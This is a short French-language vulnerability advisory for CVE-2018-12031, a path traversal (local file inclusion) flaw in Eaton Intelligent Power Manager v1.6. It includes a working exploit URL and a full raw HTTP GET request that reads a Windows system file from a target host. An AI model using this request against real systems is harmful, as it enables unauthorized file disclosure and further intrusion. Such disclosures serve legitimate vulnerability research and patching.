
CVE-2018-12031 | LFI dans Eaton Intelligent Power Manager v1.6 permet à un attaquant d'inclure un fichier, ce qui peut conduire à la divulgation d'informations sensibles, à un déni de service et à une exécution de code.
Inclusion locale de fichier dans Eaton Intelligent Power Manager v1.6 permet à un attaquant d'inclure un fichier, ce qui peut entraîner la divulgation d'informations sensibles, un déni de service et une exécution de code.
Pour exploiter la vulnérabilité, quelqu'un pourrait utiliser la requête 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' pour obtenir des informations de la cible.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
